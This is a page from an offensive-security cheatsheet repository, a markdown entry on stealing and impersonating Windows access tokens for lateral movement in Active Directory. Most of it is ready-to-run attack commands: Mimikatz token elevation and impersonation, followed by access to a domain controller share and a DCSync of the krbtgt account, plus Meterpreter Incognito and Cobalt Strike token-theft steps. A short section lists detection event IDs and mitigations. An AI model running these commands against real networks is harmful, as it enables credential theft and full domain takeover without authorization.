daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-60-token-stealing-and-impersonation.md (3543B)


      1 ---
      2 title: "Attack #60 — Token Stealing and Impersonation"
      3 description: "When a privileged user (e.g., Domain Admin) is logged into a compromised machine, their access token persists in memory. An attacker with local…"
      4 category: active-directory
      5 subcategory: "Lateral Movement"
      6 tags: ["active-directory", "credential-access", "delegation", "privilege-escalation", "lateral-movement"]
      7 tools: ["Mimikatz", "Meterpreter", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Seven/⚫ Attack #60 — Token Stealing and Impersonation.md"
     11 ---
     12 # ⚫ Attack #60 — Token Stealing & Impersonation (Lateral)
     13 
     14 ***
     15 
     16 ## 📖 How It Works
     17 
     18 When a privileged user (e.g., Domain Admin) is logged into a compromised machine, their **access token** persists in memory. An attacker with local admin/SYSTEM can **steal that token** and use it to perform actions as that user — including accessing other machines, without knowing their password. This differs from Attack #45 (SeImpersonatePrivilege) — this is about **stealing existing logged-in user tokens** for lateral movement.
     19 
     20 ***
     21 
     22 ## ⚙️ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **SYSTEM or local admin on target** | To access other users' tokens |
     27 | **Privileged user logged in** | DA/admin must have an active or cached session |
     28 
     29 ***
     30 
     31 ## 💻 Full Commands
     32 
     33 ```powershell
     34 # ── Mimikatz — token manipulation ─────────────────────────────────────────────
     35 privilege::debug
     36 token::elevate                    # Elevate to SYSTEM token
     37 token::list                       # List all available tokens
     38 token::impersonate /user:CORP\da_admin  # Impersonate a specific user's token
     39 
     40 # After impersonation:
     41 dir \\DC01.corp.local\C$           # Access DC as DA
     42 lsadump::dcsync /domain:corp.local /user:krbtgt  # DCSync as DA
     43 ```
     44 
     45 ```bash
     46 # ── Meterpreter — Incognito ───────────────────────────────────────────────────
     47 meterpreter> load incognito
     48 meterpreter> list_tokens -u
     49 # Delegation Tokens Available:
     50 # CORP\da_admin
     51 meterpreter> impersonate_token "CORP\da_admin"
     52 meterpreter> shell
     53 whoami
     54 # corp\da_admin
     55 ```
     56 
     57 ```powershell
     58 # ── Cobalt Strike (beacon) ────────────────────────────────────────────────────
     59 # steal_token <PID>           # Steal token from a specific process
     60 # make_token CORP\user pass   # Create token with credentials
     61 # rev2self                    # Revert to original token
     62 ```
     63 
     64 ***
     65 
     66 ## 🛡️ Detection — Event IDs
     67 
     68 | Event ID | Source | What to Look For |
     69 |---|---|---|
     70 | **4624** | Security Log | Logon Type 9 (NewCredentials) — token impersonation |
     71 | **Sysmon 10** | Sysmon | Process access — tool accessing LSASS for token enumeration |
     72 
     73 ***
     74 
     75 ## 🔗 Attack Chain Context
     76 
     77 ```
     78 [Token Stealing] ──→ Steal logged-in admin's token → lateral movement as them
     79          │
     80          ├──→ 🔑 No password needed — just steal the token from memory
     81          ├──→ 🔗 Commonly used after: initial compromise → SYSTEM → token theft
     82          └──→ 💀 Defeated by: limit DA logon to workstations, use PAW, Credential Guard
     83 ```
     84 
     85 ***
     86 
     87 > ✅ **Attack #60 — Token Stealing complete.**
     88 
     89 ***
     90 
     91 > 🏁 **Category 7 — Lateral Movement is now COMPLETE (7/7 attacks).**